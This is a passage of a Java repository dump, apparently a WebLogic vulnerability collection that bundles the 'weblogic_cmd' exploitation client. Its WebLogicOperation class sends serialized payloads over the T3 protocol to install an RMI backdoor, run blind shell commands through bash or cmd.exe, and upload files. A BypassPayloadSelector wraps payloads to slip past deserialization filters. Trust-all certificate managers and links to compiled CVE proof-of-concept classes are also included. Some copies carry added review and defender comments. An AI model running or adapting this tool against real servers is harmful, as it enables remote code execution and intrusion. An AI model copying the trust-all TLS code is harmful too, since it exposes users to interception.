        final ObjectInputStream objIn = new ObjectInputStream(in);
        return objIn.readObject();
    }

}
--------------------------------------------------------------------------------
/weblogic/src/main/java/com/r17a/weblogic/supeream/ssl/SocketFactory.java:
--------------------------------------------------------------------------------
package com.r17a.weblogic.supeream.ssl;

import com.supeream.Main;

import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSocketFactory;
import javax.net.ssl.TrustManager;
import java.net.Socket;
import java.security.SecureRandom;

/**
 * Created by nike on 17/6/29.
 * <p>
 * Static factory for the client socket, optionally wrapped in TLS without certificate
 * validation.
 */
public class SocketFactory {
    // Static-only class; not instantiable.
    private SocketFactory() {
    }

    /**
     * Opens a socket to {@code host:port}.
     * <p>
     * With the {@code https} option set, the socket comes from an {@code SSLContext} whose only
     * trust manager is {@link TrustManagerImpl}, so the peer certificate is never validated and
     * the connection gives no assurance about who is on the other end.
     * <p>
     * NOTE(review): three behaviours worth knowing when reading or reusing this method:
     * any exception during TLS setup or connect is swallowed and replaced by a plaintext
     * {@link Socket}, i.e. a silent downgrade; when the option is absent no socket is created
     * and {@code null} is returned; and {@code "SSL"} is the legacy protocol name, where
     * current code would request {@code "TLS"}.
     *
     * @param host remote host
     * @param port remote port
     * @return the connected socket, or {@code null} when the {@code https} option is not set
     * @throws Exception if the plaintext fallback connection fails
     */
    public static Socket newSocket(String host, int port) throws Exception {
        Socket socket = null;
        try{
            if (Main.cmdLine.hasOption("https")) {
                SSLContext context = SSLContext.getInstance("SSL");
                // Initialize: default key managers, trust-all trust manager
                context.init(null,
                        new TrustManager[]{new TrustManagerImpl()},
                        new SecureRandom());
                SSLSocketFactory factory = context.getSocketFactory();
                socket = factory.createSocket(host, port);
            }
        }catch (Exception e){
            socket = new Socket(host, port);
        }

        return socket;
    }
}

--------------------------------------------------------------------------------
/weblogic/src/main/java/com/r17a/weblogic/supeream/ssl/TrustManagerImpl.java:
--------------------------------------------------------------------------------
package com.r17a.weblogic.supeream.ssl;

import javax.net.ssl.X509TrustManager;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;

/**
 * Created by nike on 17/6/29.
 * <p>
 * Trust manager that accepts every certificate chain: both check methods return without
 * throwing, which disables peer authentication for any context that uses it. The same pattern
 * in application code is a finding in its own right, because it removes protection against
 * interception.
 */
public class TrustManagerImpl implements X509TrustManager {

    /** Accepts any client chain; performs no validation. */
    @Override
    public void checkClientTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException {
    }

    /** Accepts any server chain; performs no validation. */
    @Override
    public void checkServerTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException {

    }

    /**
     * NOTE(review): returns {@code null}, while the {@code X509TrustManager} contract documents
     * a non-null, possibly empty, array.
     */
    @Override
    public X509Certificate[] getAcceptedIssuers() {
        return null;
    }
}

--------------------------------------------------------------------------------
/weblogic/src/main/java/com/r17a/weblogic/supeream/ssl/WeblogicTrustManager.java:
--------------------------------------------------------------------------------
package com.r17a.weblogic.supeream.ssl;

import weblogic.security.SSL.TrustManager;

import java.security.cert.X509Certificate;

/**
 * Created by nike on 17/6/29.
 * <p>
 * WebLogic trust callback that approves every certificate chain it is asked about.
 */
public class WeblogicTrustManager implements TrustManager {
    /** Always returns {@code true}; neither argument is inspected. */
    @Override
    public boolean certificateCallback(X509Certificate[] x509Certificates, int i) {
        return true;
    }
}

--------------------------------------------------------------------------------
/weblogic/src/main/java/com/r17a/weblogic/supeream/weblogic/BypassPayloadSelector.java:
--------------------------------------------------------------------------------
package com.r17a.weblogic.supeream.weblogic;

import com.supeream.Main;
import com.supeream.serial.Serializables;
import weblogic.corba.utils.MarshalledObject;
import weblogic.jms.common.StreamMessageImpl;

import java.io.IOException;

/**
 * Created by nike on 17/6/26.
 * <p>
 * Optionally wraps an object in one of two WebLogic container types, chosen by
 * {@code Main.TYPE}.
 * <p>
 * For defenders: both containers carry the wrapped object as nested data, so a class filter
 * that inspects only the outer stream would, presumably, not see the inner classes. Filtering
 * has to apply wherever the nested data is deserialized, which is what allow-list filters and
 * the vendor patches address.
 */
public class BypassPayloadSelector {

    /**
     * Wraps {@code payload} in a {@code MarshalledObject}.
     *
     * @return the wrapper, or {@code null} when construction throws {@link IOException}
     *         (the stack trace is printed and the failure is otherwise ignored)
     */
    private static Object marshalledObject(Object payload) {
        MarshalledObject marshalledObject = null;
        try {
            marshalledObject = new MarshalledObject(payload);
        } catch (IOException e) {
            e.printStackTrace();
        }
        return marshalledObject;
    }


    /**
     * Places already-serialized bytes into the data buffer of a new {@code StreamMessageImpl}.
     *
     * @param object serialized bytes
     * @return the message object holding the bytes
     */
    public static Object streamMessageImpl(byte[] object) throws Exception {

        StreamMessageImpl streamMessage = new StreamMessageImpl();
        streamMessage.setDataBuffer(object, object.length);
        return streamMessage;
    }

    /**
     * Applies the wrapper selected by {@code Main.TYPE} (compared case-insensitively):
     * {@code "marshall"} or {@code "streamMessageImpl"}. Any other value returns
     * {@code payload} unchanged.
     */
    public static Object selectBypass(Object payload) throws Exception {

        if (Main.TYPE.equalsIgnoreCase("marshall")) {
            payload = marshalledObject(payload);
        } else if (Main.TYPE.equalsIgnoreCase("streamMessageImpl")) {
            payload = streamMessageImpl(Serializables.serialize(payload));
        }
        return payload;
    }


}

--------------------------------------------------------------------------------
/weblogic/src/main/java/com/r17a/weblogic/supeream/weblogic/ObjectTest.java:
--------------------------------------------------------------------------------
package com.r17a.weblogic.supeream.weblogic;

import com.supeream.serial.BytesOperation;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;

/**
 * Created by nike on 17/7/11.
 * <p>
 * Scratch program that round-trips an object stream through the hex helpers.
 */
public class ObjectTest {
    /**
     * Writes a UTF string to an object stream, prints the stream bytes as hex, decodes the hex
     * again and calls {@code readObject()} on the result.
     * <p>
     * NOTE(review): the object stream is not flushed before {@code toByteArray()}, so the
     * buffered string may be missing from the dump, and the stream holds a UTF string rather
     * than an object, so {@code readObject()} is not expected to return one.
     */
    public static void main(String[] args) throws Exception {


        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeUTF("xxx");
        String xx = BytesOperation.bytesToHexString(byteArrayOutputStream.toByteArray());
        System.out.println(xx);
        byte[] cons = BytesOperation.hexStringToBytes(xx);



        ByteArrayInputStream bis = new ByteArrayInputStream(cons);
        ObjectInputStream objectInputStream = new ObjectInputStream(bis);
        objectInputStream.readObject();
    }
}

--------------------------------------------------------------------------------
/weblogic/src/main/java/com/r17a/weblogic/supeream/weblogic/WebLogicOperation.java:
--------------------------------------------------------------------------------
package com.r17a.weblogic.supeream.weblogic;

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//

import com.supeream.Main;
import com.supeream.serial.SerialDataGenerator;

/**
 * Client-side operations of the tool. Each method asks {@code SerialDataGenerator} for a byte
 * array and hands it to {@code T3ProtocolOperation.send}; neither helper is shown in this
 * listing.
 * <p>
 * For defenders: judging by the helper names, every operation arrives at the server as
 * serialized data on the T3 listener, so restricting who can reach T3 and filtering what it
 * may deserialize covers all of them at once.
 */
public class WebLogicOperation {

    /** Sends the request built from the single argument {@code "install"}. */
    public static void installRmi(String host, String port) throws Exception {
        byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"install"});
        T3ProtocolOperation.send(host, port, payload);
    }

    /** Sends the request built from the single argument {@code "uninstall"}. */
    public static void unInstallRmi(String host, String port) throws Exception {
        byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"uninstall"});
        T3ProtocolOperation.send(host, port, payload);
    }

    /** Sends the request built from {@code "blind"} and the value of command-line option {@code C}. */
    public static void blind(String host, String port) throws Exception {
        byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"blind", Main.cmdLine.getOptionValue("C")});
        T3ProtocolOperation.send(host, port, payload);
    }

    /** Sends the request built by {@code serialUploadDatas} from a path and file content. */
    public static void uploadFile(String host, String port, String filePath, byte[] content) throws Exception {
        byte[] payload = SerialDataGenerator.serialUploadDatas(filePath, content);
        T3ProtocolOperation.send(host, port, payload);
    }

    /**
     * Sends the request built by {@code serialBlindDatas} from a command array.
     * The array is {@code {cmd}} when the {@code os} option is absent, a {@code /bin/bash -c}
     * form when the option equals {@code linux} (case-insensitive), and a {@code cmd.exe /c}
     * form for any other value.
     */
    public static void blindExecute(String host, String port, String cmd) throws Exception {
        String[] cmds = new String[]{cmd};
        if (Main.cmdLine.hasOption("os")) {
            if (Main.cmdLine.getOptionValue("os").equalsIgnoreCase("linux")) {
                cmds = new String[]{"/bin/bash", "-c", cmd};
            } else {
                cmds = new String[]{"cmd.exe", "/c", cmd};
            }
        }
        byte[] payload = SerialDataGenerator.serialBlindDatas(cmds);
        T3ProtocolOperation.send(host, port, payload);
    }

}

--------------------------------------------------------------------------------
/weblogic/src/main/java/com/supeream/payload/PayloadTest.java:
--------------------------------------------------------------------------------
package com.supeream.payload;

import com.supeream.serial.BytesOperation;

/**
 * Created by nike on 17/7/3.
7 | */ 8 | public class PayloadTest { 9 | public static void main(String[] args) throws Exception { 10 | // byte[] iRemoteCode = BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/out/production/weblogic_cmd/com/com.supeream/payload/IRemote.class"); 11 | // System.out.println(BytesOperation.bytesToHexString(iRemoteCode)); 12 | //DefiningClassLoader definingClassLoader = new DefiningClassLoader(); 13 | // Class cls = definingClassLoader.defineClass("com.com.supeream.payload.IRemote",iRemoteCode); 14 | byte[] remoteCodeImpl = BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/out/production/weblogic_cmd/com/com.supeream/payload/RemoteImpl.class"); 15 | System.out.println(BytesOperation.bytesToHexString(remoteCodeImpl)); 16 | 17 | // Class cls_ = definingClassLoader.defineClass("com.com.supeream.payload.RemoteImpl", remoteCodeImpl); 18 | Class.forName("com.supeream.payload.RemoteImpl"); 19 | // System.out.println(cls_); 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/supeream/serial/BytesOperation.java: -------------------------------------------------------------------------------- 1 | package com.supeream.serial; 2 | 3 | // 4 | // Source code recreated from a .class file by IntelliJ IDEA 5 | // (powered by Fernflower decompiler) 6 | // 7 | 8 | import java.io.FileInputStream; 9 | 10 | public class BytesOperation { 11 | 12 | 13 | public static byte[] hexStringToBytes(String hexString) { 14 | if (hexString != null && !hexString.equals("")) { 15 | hexString = hexString.toUpperCase(); 16 | int length = hexString.length() / 2; 17 | char[] hexChars = hexString.toCharArray(); 18 | byte[] d = new byte[length]; 19 | 20 | for (int i = 0; i < length; ++i) { 21 | int pos = i * 2; 22 | d[i] = (byte) (charToByte(hexChars[pos]) << 4 | charToByte(hexChars[pos + 1])); 23 | } 24 | 25 | return d; 26 | } else { 27 | return null; 28 | } 29 | } 30 | 31 | private static byte 
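charToByte(char c) {
        return (byte) "0123456789ABCDEF".indexOf(c);
    }

    /**
     * Concatenates two byte arrays into a newly allocated array.
     *
     * @param byte_1 leading bytes; must not be null
     * @param byte_2 trailing bytes; must not be null
     * @return a new array holding {@code byte_1} followed by {@code byte_2}
     */
    public static byte[] byteMerger(byte[] byte_1, byte[] byte_2) {
        byte[] byte_3 = new byte[byte_1.length + byte_2.length];
        System.arraycopy(byte_1, 0, byte_3, 0, byte_1.length);
        System.arraycopy(byte_2, 0, byte_3, byte_1.length, byte_2.length);
        return byte_3;
    }

    /**
     * Renders a byte array as lower-case hexadecimal, two digits per byte.
     *
     * @param src bytes to encode
     * @return the hex string, or {@code null} when {@code src} is null or empty
     *         (callers have to handle the null themselves)
     */
    public static String bytesToHexString(byte[] src) {
        if (src == null || src.length <= 0) {
            return null;
        }
        StringBuilder stringBuilder = new StringBuilder(src.length * 2);
        for (byte b : src) {
            // Mask to 0..255 so negative bytes do not sign-extend to eight hex digits.
            String hv = Integer.toHexString(b & 0xFF);
            if (hv.length() < 2) {
                stringBuilder.append('0');
            }
            stringBuilder.append(hv);
        }
        return stringBuilder.toString();
    }

    /**
     * Reads a whole file into memory.
     *
     * <p>The stream is drained in a loop because a single {@code read} call may return
     * fewer bytes than the file holds, and it is closed in {@code finally} so a failed
     * read does not leak the file handle. An empty file yields an empty array.
     *
     * @param FilePath path of the file to read; the path is used as given, so it must
     *                 not come from an untrusted source without validation
     * @return the file content
     * @throws Exception if the file cannot be opened or read
     */
    public static byte[] GetByteByFile(String FilePath) throws Exception {
        FileInputStream fi = new FileInputStream(FilePath);
        try {
            java.io.ByteArrayOutputStream collected = new java.io.ByteArrayOutputStream();
            byte[] chunk = new byte[8192];
            int n;
            while ((n = fi.read(chunk)) != -1) {
                collected.write(chunk, 0, n);
            }
            return collected.toByteArray();
        } finally {
            fi.close();
        }
    }

    /**
     * Ad-hoc check: prints the hex form of one file.
     * NOTE(review): the path is a developer-local absolute path and fails on any other machine.
     */
    public static void main(String[] args) throws Exception {
        System.out.println(BytesOperation.bytesToHexString(BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/lib/remote.jar")));
    }
}

--------------------------------------------------------------------------------
/weblogic/src/main/java/com/supeream/serial/Reflections.java:
--------------------------------------------------------------------------------
package com.supeream.serial;

import java.lang.reflect.Constructor;
import java.lang.reflect.Field;

public class Reflections {

    /**
     * Looks up a declared field by name, walking up the superclass chain, and makes it
     * accessible.
     *
     * <p>{@code getDeclaredField} reports a missing field by throwing
     * {@code NoSuchFieldException}, never by returning null, so the superclass lookup
     * has to live in the catch block.
     *
     * <p>{@code setAccessible(true)} switches off Java access checks for the returned
     * field; everything obtained through this helper bypasses {@code private}.
     *
     * @param clazz     class to start the search at
     * @param fieldName name of the field
     * @return the accessible field
     * @throws Exception {@code NoSuchFieldException} when no class in the chain declares the field
     */
    public static Field getField(final Class clazz, final String fieldName) throws Exception {
        Field field;
        try {
            field = clazz.getDeclaredField(fieldName);
        } catch (NoSuchFieldException e) {
            final Class parent = clazz.getSuperclass();
            if (parent == null) {
                throw e;
            }
            return getField(parent, fieldName);
        }
        field.setAccessible(true);
        return field;
    }

    /**
     * Writes {@code value} into the named field of {@code obj}, ignoring access modifiers.
     *
     * @param obj       target instance; must not be null
     * @param fieldName name of the field to set
     * @param value     value to store
     * @throws Exception if the field is missing or cannot be written
     */
    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

    /**
     * Reads the named field of {@code obj}, ignoring access modifiers.
     *
     * @param obj       instance to read from; must not be null
     * @param fieldName name of the field to read
     * @return the current field value
     * @throws Exception if the field is missing or cannot be read
     */
    public static Object getFieldValue(final Object obj, final String fieldName) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        return field.get(obj);
    }

    /**
     * Returns element 0 of the named class's declared constructors, made accessible.
     *
     * <p>The reflection API does not guarantee any order for that array, so "first" is
     * only well defined for classes with a single constructor. {@code Class.forName}
     * also loads and initializes the class, which runs its static initializers, so
     * {@code name} must not be taken from untrusted input.
     *
     * @param name fully qualified class name
     * @return the accessible constructor
     * @throws Exception if the class cannot be loaded or declares no constructor
     */
    public static Constructor getFirstCtor(final String name) throws Exception {
        final Constructor ctor = Class.forName(name).getDeclaredConstructors()[0];
        ctor.setAccessible(true);
        return ctor;
    }

}

--------------------------------------------------------------------------------
/weblogic/src/main/java/com/supeream/serial/Serializables.java:
--------------------------------------------------------------------------------
package com.supeream.serial;

import java.io.*;

public class Serializables {

    /**
     * Serializes an object with Java native serialization.
     *
     * @param obj object to serialize
     * @return the serialized bytes
     * @throws IOException if the object graph cannot be written
     */
    public static byte[] serialize(final Object obj) throws IOException {
        final ByteArrayOutputStream out = new ByteArrayOutputStream();
        serialize(obj, out);
        return out.toByteArray();
    }

    /**
     * Serializes an object onto the given stream.
     *
     * <p>Closing the {@code ObjectOutputStream} also closes {@code out}; the caller
     * cannot write to it afterwards.
     *
     * @param obj object to serialize
     * @param out destination stream, closed on return
     * @throws IOException if the object graph cannot be written
     */
    public static void serialize(final Object obj, final OutputStream out) throws IOException {
        final ObjectOutputStream objOut = new ObjectOutputStream(out);
        objOut.writeObject(obj);
        objOut.flush();
        objOut.close();
    }

    /**
     * Deserializes an object from a byte array; see {@link #deserialize(InputStream)}
     * for the trust requirement on the input.
     *
     * @param serialized bytes in Java serialization format
     * @return the reconstructed object
     */
    public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException {
        final ByteArrayInputStream in = new ByteArrayInputStream(serialized);
        return deserialize(in);
    }

    /**
     * Deserializes one object from the stream.
     *
     * <p>SECURITY: {@code readObject()} instantiates whatever classes the stream names
     * and runs their deserialization hooks; no class allow-list is applied here. Only
     * pass bytes produced locally by {@code serialize}. For data from any other source,
     * install a JEP 290 serialization filter or use a data-only format instead.
     *
     * @param in stream positioned at a serialized object
     * @return the reconstructed object
     */
    public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException {
        final ObjectInputStream objIn = new ObjectInputStream(in);
        return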
objIn.readObject();
    }

}
--------------------------------------------------------------------------------
/weblogic/src/main/java/com/supeream/ssl/SocketFactory.java:
--------------------------------------------------------------------------------
package com.supeream.ssl;

import com.supeream.Main;

import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSocketFactory;
import javax.net.ssl.TrustManager;
import java.net.Socket;
import java.security.SecureRandom;

/**
 * Created by nike on 17/6/29.
 */
public class SocketFactory {
    private SocketFactory() {
    }

    /**
     * Opens a socket to {@code host:port}, using TLS when the {@code https} command-line
     * option is present.
     *
     * <p>Review notes on the behaviour as written:
     * <ul>
     *   <li>Without the {@code https} option nothing is opened and {@code null} is
     *       returned; callers must check for it.</li>
     *   <li>The TLS context is initialised with {@code TrustManagerImpl}, which accepts
     *       every certificate chain, so the peer is not authenticated and the connection
     *       can be intercepted.</li>
     *   <li>Any exception raised on the TLS path is swallowed and a plaintext socket is
     *       returned instead. The caller gets no signal that the traffic is unencrypted;
     *       code that needs confidentiality should propagate the failure.</li>
     *   <li>{@code "SSL"} is a legacy context name; NOTE(review): which protocol versions
     *       it enables depends on the JRE, confirm against the target runtime.</li>
     * </ul>
     *
     * @param host remote host name or address
     * @param port remote port
     * @return the connected socket, or {@code null} when {@code https} was not requested
     * @throws Exception if the plaintext fallback connection fails
     */
    public static Socket newSocket(String host, int port) throws Exception {
        try {
            // The option lookup stays inside the try: a failure here also takes the fallback path.
            if (!Main.cmdLine.hasOption("https")) {
                return null;
            }
            SSLContext tlsContext = SSLContext.getInstance("SSL");
            // initialise with the accept-all trust manager; no key material, fresh randomness
            TrustManager[] acceptAll = new TrustManager[]{new TrustManagerImpl()};
            tlsContext.init(null, acceptAll, new SecureRandom());
            SSLSocketFactory tlsSockets = tlsContext.getSocketFactory();
            return tlsSockets.createSocket(host, port);
        } catch (Exception e) {
            // Silent downgrade to plaintext, see the notes above.
            return new Socket(host, port);
        }
    }
}

--------------------------------------------------------------------------------
/weblogic/src/main/java/com/supeream/ssl/TrustManagerImpl.java:
--------------------------------------------------------------------------------
package com.supeream.ssl;

import javax.net.ssl.X509TrustManager;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;

/**
 * Created by nike on 17/6/29.
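 *
 * <p>Trust manager that validates nothing: both check methods return without
 * inspecting the chain, so every certificate (expired, self-signed, issued for another
 * host) is accepted. A TLS context built on it encrypts traffic but does not
 * authenticate the peer. In a code review or a static-analysis finding this class is
 * the thing to look for; production code should use the platform default trust manager
 * or one built from a pinned trust store.
 */
public class TrustManagerImpl implements X509TrustManager {

    /** Accepts any client certificate chain without inspecting it. */
    @Override
    public void checkClientTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException {
    }

    /** Accepts any server certificate chain without inspecting it. */
    @Override
    public void checkServerTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException {

    }

    /**
     * Returns an empty issuer list.
     *
     * <p>The {@code X509TrustManager} contract requires a non-null (possibly empty)
     * array, so an empty array is returned rather than {@code null}.
     */
    @Override
    public X509Certificate[] getAcceptedIssuers() {
        return new X509Certificate[0];
    }
}

--------------------------------------------------------------------------------
/weblogic/src/main/java/com/supeream/ssl/WeblogicTrustManager.java:
--------------------------------------------------------------------------------
package com.supeream.ssl;

import weblogic.security.SSL.TrustManager;

import java.security.cert.X509Certificate;

/**
 * Created by nike on 17/6/29.
 *
 * <p>Callback that answers {@code true} for every chain, whatever the second argument
 * says, so certificate validation is effectively disabled wherever it is installed.
 * NOTE(review): the int argument presumably carries the validation result from the
 * WebLogic SSL layer; confirm against the weblogic API documentation.
 */
public class WeblogicTrustManager implements TrustManager {
    @Override
    public boolean certificateCallback(X509Certificate[] x509Certificates, int i) {
        return true;
    }
}

--------------------------------------------------------------------------------
/weblogic/src/main/java/com/supeream/weblogic/BypassPayloadSelector.java:
--------------------------------------------------------------------------------
package com.supeream.weblogic;

import com.supeream.Main;
import com.supeream.serial.Serializables;
import weblogic.corba.utils.MarshalledObject;
import weblogic.jms.common.StreamMessageImpl;

import java.io.IOException;

/**
 * Created by nike on 17/6/26.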
12 | */ 13 | public class BypassPayloadSelector { 14 | 15 | private static Object marshalledObject(Object payload) { 16 | MarshalledObject marshalledObject = null; 17 | try { 18 | marshalledObject = new MarshalledObject(payload); 19 | } catch (IOException e) { 20 | e.printStackTrace(); 21 | } 22 | return marshalledObject; 23 | } 24 | 25 | 26 | public static Object streamMessageImpl(byte[] object) throws Exception { 27 | 28 | StreamMessageImpl streamMessage = new StreamMessageImpl(); 29 | streamMessage.setDataBuffer(object, object.length); 30 | return streamMessage; 31 | } 32 | 33 | public static Object selectBypass(Object payload) throws Exception { 34 | 35 | if (Main.TYPE.equalsIgnoreCase("marshall")) { 36 | payload = marshalledObject(payload); 37 | } else if (Main.TYPE.equalsIgnoreCase("streamMessageImpl")) { 38 | payload = streamMessageImpl(Serializables.serialize(payload)); 39 | } 40 | return payload; 41 | } 42 | 43 | 44 | } 45 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/supeream/weblogic/ObjectTest.java: -------------------------------------------------------------------------------- 1 | package com.supeream.weblogic; 2 | 3 | import com.supeream.serial.BytesOperation; 4 | 5 | import java.io.ByteArrayInputStream; 6 | import java.io.ByteArrayOutputStream; 7 | import java.io.ObjectInputStream; 8 | import java.io.ObjectOutputStream; 9 | 10 | /** 11 | * Created by nike on 17/7/11. 
12 | */ 13 | public class ObjectTest { 14 | public static void main(String[] args) throws Exception { 15 | 16 | 17 | ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); 18 | ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream); 19 | objectOutputStream.writeUTF("xxx"); 20 | String xx = BytesOperation.bytesToHexString(byteArrayOutputStream.toByteArray()); 21 | System.out.println(xx); 22 | byte[] cons = BytesOperation.hexStringToBytes(xx); 23 | 24 | 25 | 26 | ByteArrayInputStream bis = new ByteArrayInputStream(cons); 27 | ObjectInputStream objectInputStream = new ObjectInputStream(bis); 28 | objectInputStream.readObject(); 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/supeream/weblogic/WebLogicOperation.java: -------------------------------------------------------------------------------- 1 | package com.supeream.weblogic; 2 | 3 | // 4 | // Source code recreated from a .class file by IntelliJ IDEA 5 | // (powered by Fernflower decompiler) 6 | // 7 | 8 | import com.supeream.Main; 9 | import com.supeream.serial.SerialDataGenerator; 10 | 11 | public class WebLogicOperation { 12 | 13 | public static void installRmi(String host, String port) throws Exception { 14 | byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"install"}); 15 | T3ProtocolOperation.send(host, port, payload); 16 | } 17 | 18 | public static void unInstallRmi(String host, String port) throws Exception { 19 | byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"uninstall"}); 20 | T3ProtocolOperation.send(host, port, payload); 21 | } 22 | 23 | public static void blind(String host, String port) throws Exception { 24 | byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"blind", Main.cmdLine.getOptionValue("C")}); 25 | T3ProtocolOperation.send(host, port, payload); 26 | } 27 | 28 | public static void uploadFile(String host, String 
port, String filePath, byte[] content) throws Exception { 29 | byte[] payload = SerialDataGenerator.serialUploadDatas(filePath, content); 30 | T3ProtocolOperation.send(host, port, payload); 31 | } 32 | 33 | public static void blindExecute(String host, String port, String cmd) throws Exception { 34 | String[] cmds = new String[]{cmd}; 35 | if (Main.cmdLine.hasOption("os")) { 36 | if (Main.cmdLine.getOptionValue("os").equalsIgnoreCase("linux")) { 37 | cmds = new String[]{"/bin/bash", "-c", cmd}; 38 | } else { 39 | cmds = new String[]{"cmd.exe", "/c", cmd}; 40 | } 41 | } 42 | byte[] payload = SerialDataGenerator.serialBlindDatas(cmds); 43 | T3ProtocolOperation.send(host, port, payload); 44 | } 45 | 46 | } 47 | -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/Main.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/Main.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_14654.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_14654.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_14756.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_14756.class -------------------------------------------------------------------------------- 
/weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_14841.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_14841.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_2555.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_2555.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_2883_POC1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_2883_POC1.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_2883_POC2.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_2883_POC2.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/cve/CVE_2021_2135.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/cve/CVE_2021_2135.class -------------------------------------------------------------------------------- 
/weblogic/target/classes/com/r17a/weblogic/cve/CVE_2021_2394.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/cve/CVE_2021_2394.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/cve/ObjectPayload.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/cve/ObjectPayload.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/payload/PayloadTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/payload/PayloadTest.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/payload/RemoteImpl.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/payload/RemoteImpl.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/serial/BytesOperation.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/serial/BytesOperation.class 
